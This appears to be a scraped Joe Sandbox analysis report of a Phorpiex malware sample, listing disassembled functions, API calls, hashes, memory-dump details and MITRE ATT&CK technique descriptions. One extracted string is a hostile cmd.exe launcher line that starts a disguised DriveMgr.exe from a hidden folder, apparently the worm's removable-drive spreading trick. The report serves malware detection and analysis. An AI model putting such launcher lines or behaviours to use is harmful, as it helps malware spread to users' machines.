Instruction Fuzzy Hash: DC71AF70E0420ADBDF24DBA0DC95BBFB775BF44340F14C119E9196B2C2D678A946C790

Uniqueness

Uniqueness Score: -1.00%

Function 0077B3E0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 0077B53E
memmove.MSVCRT ref: 0077B5AC
memcmp.MSVCRT ref: 0077B5F9

Strings

\, xrefs: 0077B5CC

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: memmove$memcmp
String ID: \
API String ID: 845337883-2967466578
Opcode ID: 74fcf3e4d10a9c81c09dcf7789ae585a115708f4be19fe9ccfb8603a070d1ead
Instruction ID: bdde50f82038142b3cf79abe4589115329fe01b217e180913a11fe42783b198e
Opcode Fuzzy Hash: 74fcf3e4d10a9c81c09dcf7789ae585a115708f4be19fe9ccfb8603a070d1ead
Instruction Fuzzy Hash: 1171B0B0D002689BDF24DB14CC95BEDBBB5AF54344F18C1E8E58CAA242DB388B958F54

Uniqueness

Uniqueness Score: -1.00%

Function 007754B0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00775526
lstrlenA.KERNEL32(?), ref: 00775597

Strings

net, xrefs: 007755A8
net, xrefs: 00775537

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: lstrlen
String ID: net$net
API String ID: 1659193697-813024420
Opcode ID: 50ea9e4832ce221c3f15caca6877814d0b4b01e0db8e185b02af21b1241aeb64
Instruction ID: 8ffedcdbcc9bdde5292d58d9c49228c480b558620efb430d0ff0bfe5607333eb
Opcode Fuzzy Hash: 50ea9e4832ce221c3f15caca6877814d0b4b01e0db8e185b02af21b1241aeb64
Instruction Fuzzy Hash: 73316074A4420DAFDB18DBA4CC95FEDB7B9BB48304F248598E615E7280D6B89F84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00781000 Relevance: 6.1, APIs: 4, Instructions: 85sleepthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,0078A128,00000208), ref: 00781015

Part of subcall function 007801E0: _wfopen.MSVCRT ref: 007801F6
Part of subcall function 007801E0: fseek.MSVCRT ref: 00780209
Part of subcall function 007801E0: ftell.MSVCRT ref: 00780215
Part of subcall function 007801E0: fclose.MSVCRT ref: 00780224

ExitThread.KERNEL32 ref: 00781117

Part of subcall function 00780870: GetLogicalDrives.KERNEL32 ref: 00780876
Part of subcall function 00780870: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 007808C4
Part of subcall function 00780870: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 007808F1
Part of subcall function 00780870: RegCloseKey.ADVAPI32(?), ref: 0078090E

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 007810AE
Sleep.KERNEL32(000007D0), ref: 0078110A

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: CloseDrivesExitFileInformationLogicalModuleNameOpenQuerySleepThreadValueVolume_wfopenfclosefseekftell
String ID:
API String ID: 3729102641-0
Opcode ID: 5123c78b750a0bca21e256604ca3225b032e366a63804574df3f0a0c7f6ddcb3
Instruction ID: f599bb7128374189c46e840df42c0ea54f4c1535f2c5830cbd7bf3d2668ad6d3
Opcode Fuzzy Hash: 5123c78b750a0bca21e256604ca3225b032e366a63804574df3f0a0c7f6ddcb3
Instruction Fuzzy Hash: 4D31C5B1D80208FBDB14EBE0DC4EFEE7778AF04701F608059E206A6180D6789684CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 007749C0 Relevance: 6.1, APIs: 4, Instructions: 84networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00777020: getaddrinfo.WS2_32(00000000,?,00000001,00000006), ref: 0077705F

socket.WS2_32(?,?,?), ref: 00774A1E
connect.WS2_32(000000FF,?,?), ref: 00774A48
freeaddrinfo.WS2_32(?), ref: 00774AA5

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: connectfreeaddrinfogetaddrinfosocket
String ID:
API String ID: 952663764-0
Opcode ID: 39a6e0b9dabe6283139b557e218e83bc4e127a8fdfb39c90ce448dbf0904c675
Instruction ID: bef2f79345229b66bba460f9858581d2f7e8780c4427cdc6c16a02ed2648792e
Opcode Fuzzy Hash: 39a6e0b9dabe6283139b557e218e83bc4e127a8fdfb39c90ce448dbf0904c675
Instruction Fuzzy Hash: 013162B9A04209EFCB04CF94C944DAEB7B5BF48340F25C689E9199B381C735DE41DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00781130 Relevance: 6.1, APIs: 4, Instructions: 62fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000001,C0000000,?,00000000,00000000,?,00000000,?,00000002,00000001,00000080), ref: 00781153
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 0078116C
WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00781198
CloseHandle.KERNEL32(000000FF), ref: 007811CD

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: 8db4231ae2af6b1561c0e00d7c6afaf2cc514ae9b6c452e41174eb294a4d05bb
Instruction ID: 6332e6173f173249797b17826c90f14e1379858fd092aaaf6efab391c5289c30
Opcode Fuzzy Hash: 8db4231ae2af6b1561c0e00d7c6afaf2cc514ae9b6c452e41174eb294a4d05bb
Instruction Fuzzy Hash: 7A210B75E4020CFFDB14DFA8CD99FDEBB79AF48300F208588E615A7280D674AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 007801E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

_wfopen.MSVCRT ref: 007801F6
fseek.MSVCRT ref: 00780209
ftell.MSVCRT ref: 00780215
fclose.MSVCRT ref: 00780224

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: _wfopenfclosefseekftell
String ID:
API String ID: 3257356417-0
Opcode ID: 0817f54fe16e63bb847e5ffc06dcec61cddb5f2a9d71a3975b65c3f69b670872
Instruction ID: 6ab6851bb41a7fcda3dbed6d94fc62a030ef5b51bf1e1460daf274c26030b7bd
Opcode Fuzzy Hash: 0817f54fe16e63bb847e5ffc06dcec61cddb5f2a9d71a3975b65c3f69b670872
Instruction Fuzzy Hash: 76F01CF5D44208FBDB00FBA49D46B5D7778AB44700F1041A4F9046B241E579AF149791

Uniqueness

Uniqueness Score: -1.00%

Function 00778FD0 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationthreadCOMMON

Download Yara Rule

APIs

closesocket.WS2_32(00000000), ref: 00778FE7
WaitForSingleObject.KERNEL32(00000000,00001388,00000000,?,0077E987,00000000,00000000,00000000), ref: 00778FF9
TerminateThread.KERNEL32(00000000,00000000,?,0077E987,00000000,00000000,00000000), ref: 00779008
CloseHandle.KERNEL32(00000000,?,0077E987,00000000,00000000,00000000), ref: 00779014

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: CloseHandleObjectSingleTerminateThreadWaitclosesocket
String ID:
API String ID: 1562794747-0
Opcode ID: 565bd6f46162daa77f9343f660bc78b1bc4e65616ab96cb814c95c98d8854d7a
Instruction ID: 6cf0a09ffa2c3c216b9321f142ef0400be7702105fcbd4211b6eabae769b113d
Opcode Fuzzy Hash: 565bd6f46162daa77f9343f660bc78b1bc4e65616ab96cb814c95c98d8854d7a
Instruction Fuzzy Hash: AAF030765C4304ABCB00DBA8EC0CF293F6CA705315F28C244F7058A2A0DABD98058799

Uniqueness

Uniqueness Score: -1.00%

Function 00780930 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(007877A4,00000000,00000017,00787784,00000008,shell32.dll,00000008), ref: 00780948

Strings

%windir%\system32\cmd.exe, xrefs: 00780956
/c start __ & __\DriveMgr.exe & exit, xrefs: 0078098F

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: CreateInstance
String ID: %windir%\system32\cmd.exe$/c start __ & __\DriveMgr.exe & exit
API String ID: 542301482-2643104863
Opcode ID: a6ca5b0e81fd0f59f3f249c7b70edff668cccb9b0788750ccd89da1c28cce627
Instruction ID: baf3b2994ce37962f121a96e8a7d576fff860a4148f13d6c0bccd150d8f4dfac
Opcode Fuzzy Hash: a6ca5b0e81fd0f59f3f249c7b70edff668cccb9b0788750ccd89da1c28cce627
Instruction Fuzzy Hash: 8D21B779740509EFC708EF98D991D9EB3B9AF8C700F204198E6059B3A5DA71FE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 007771F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(Xw,0000FFFF,00000080,00000001,00000004), ref: 00777223
closesocket.WS2_32 ref: 0077722F

Strings

Xw, xrefs: 00777205, 00777222

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: closesocketsetsockopt
String ID: Xw
API String ID: 553142124-290828094
Opcode ID: f76633d5f022d34411ad77b58e2396344a049040afba964bd36ce9eba77dada2
Instruction ID: 809699f9a36b6f39011da029cea7c4da150fc697100f9f06dc9763c0d47f9077
Opcode Fuzzy Hash: f76633d5f022d34411ad77b58e2396344a049040afba964bd36ce9eba77dada2
Instruction Fuzzy Hash: 0AF0D474240209ABCB14DF94D841AA97779FF49760F2083A8FD688F3E0DB75AA45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00774220 Relevance: 5.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00774264
GlobalFree.KERNEL32(00000000), ref: 007742FE
GlobalFree.KERNEL32(00000000), ref: 0077430E
GlobalFree.KERNEL32(00000000), ref: 0077431E

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: FreeGlobal$ErrorLast
String ID:
API String ID: 1236395209-0
Opcode ID: cd616975e9d79cea9d77d3627c4cc57c9ccf96b7640ac500f5c0b3f8860238b0
Instruction ID: 8334f44626a4cda3ef7f7cc6e544a7fbe8043845a9244a0b7d7accb6c9efd861
Opcode Fuzzy Hash: cd616975e9d79cea9d77d3627c4cc57c9ccf96b7640ac500f5c0b3f8860238b0
Instruction Fuzzy Hash: 73319E75984249EBDF10DBF4DC68BFE7BB46F20341F04C458F40896182DB788648CB61

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6K1uYM85lS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Phorpiex

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\180771693628709\lsass.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
6K1uYM85lS.exe

Function 009B0290 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67
networkfilestringCOMMON

Function 009B0240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
stringCOMMON

Function 009B2D0F Relevance: 28.0, APIs: 11, Strings: 5, Instructions: 47
filesleepregistryCOMMON

Function 009B0080 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 62
sleepprocessCOMMON

Function 009B427A Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 009B0B30 Relevance: 72.0, APIs: 31, Strings: 10, Instructions: 291
fileCOMMON

Function 009AFE60 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 178
filememoryencryptionCOMMON

Function 009B09F0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre